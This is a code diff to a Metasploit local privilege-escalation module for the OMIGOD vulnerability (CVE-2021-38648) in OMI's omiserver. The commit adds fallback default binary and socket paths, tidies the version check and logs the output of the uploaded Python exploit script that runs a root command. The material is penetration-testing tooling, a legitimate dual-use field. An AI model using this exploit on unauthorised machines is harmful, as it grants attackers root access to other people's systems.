Fail over to default paths

modules/exploits/linux/local/cve_2021_38648_omigod.rb

@@ -12,6 +12,9 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
 
+  DEFAULT_SERVER_BIN_PATH = '/opt/omi/bin/omiserver'.freeze
+  DEFAULT_SOCKET_PATH = '/var/opt/omi/run/omiserver.sock'.freeze
+
   def initialize(info = {})
     super(
       update_info(
@@ -78,15 +81,19 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     pid = pidof('omiserver').first
-    return CheckCode::Safe if pid.nil?
+    return CheckCode::Safe('The omiserver process was not found.') if pid.nil?
 
     omiserver_bin = read_file("/proc/#{pid}/cmdline").split("\x00", 2).first
+    omiserver_bin = DEFAULT_SERVER_BIN_PATH if omiserver_bin.blank? && file?(DEFAULT_SERVER_BIN_PATH)
+    return CheckCode::Unknown('Failed to find the omiserver binary path.') if omiserver_bin.blank?
+
     vprint_status("Found #{omiserver_bin} running in PID: #{pid}")
-    if cmd_exec("#{omiserver_bin} --version") !~ /\sOMI-(\d+(\.\d+){2,3}(-\d+)?)\s/
+    if cmd_exec("#{omiserver_bin} --version") =~ /\sOMI-(\d+(\.\d+){2,3}(-\d+)?)\s/
+      version = Regexp.last_match(1)
+    else
       return CheckCode::Unknown('Failed to identify the version of the omiserver binary.')
     end
 
-    version = Regexp.last_match(1)
     return CheckCode::Safe("Version #{version} is not affected.") if Rex::Version.new(version) > Rex::Version.new('1.6.8-0')
 
     CheckCode::Appears("Version #{version} is affected.")
@@ -95,6 +102,7 @@ class MetasploitModule < Msf::Exploit::Local
   def upload(path, data)
     print_status "Writing '#{path}' (#{data.size} bytes) ..."
     write_file path, data
+  ensure
     register_file_for_cleanup(path)
   end
 
@@ -109,11 +117,17 @@ class MetasploitModule < Msf::Exploit::Local
     pid = pidof('omiserver').first
     fail_with(Failure::NotFound, 'The omiserver pid was not found.') if pid.nil?
 
-    if read_file("/proc/#{pid}/net/unix") !~ %r{\s(/(\S+)server\.sock)$}
+    if read_file("/proc/#{pid}/net/unix") =~ %r{\s(/(\S+)server\.sock)$}
-      fail_with(Failure::NotFound, 'The socket path could not be found.')
+      socket_path = Regexp.last_match(1)
+    else
+      begin
+        socket_path = DEFAULT_SOCKET_PATH if stat(DEFAULT_SOCKET_PATH).socket?
+      rescue StandardError # rubocop:disable Lint/SuppressedException
+      end
     end
 
-    socket_path = Regexp.last_match(1)
+    fail_with(Failure::NotFound, 'The socket path could not be found.') if socket_path.blank?
+
     vprint_status("Socket path: #{socket_path}")
     socket_path
   end
@@ -122,7 +136,7 @@ class MetasploitModule < Msf::Exploit::Local
     python_binary = find_exec_program
     fail_with(Failure::NotFound, 'The python binary was not found.') unless python_binary
 
-    vprint_status("Using '#{python_binary}' to run exploit")
+    vprint_status("Using '#{python_binary}' to run the exploit")
     socket_path = get_socket_path
     path = datastore['WritableDir']
     python_script = rand_text_alphanumeric(5..10) + '.py'
@@ -151,6 +165,7 @@ class MetasploitModule < Msf::Exploit::Local
     upload("#{path}/#{python_script}", exploit_data('CVE-2021-38648', 'exploit.py'))
     cmd = "#{python_binary} #{path}/#{python_script} -s '#{socket_path}' '#{root_cmd}'"
     vprint_status("Running #{cmd}")
-    cmd_exec(cmd)
+    output = cmd_exec(cmd)
+    vprint_line(output) unless output.blank?
   end
 end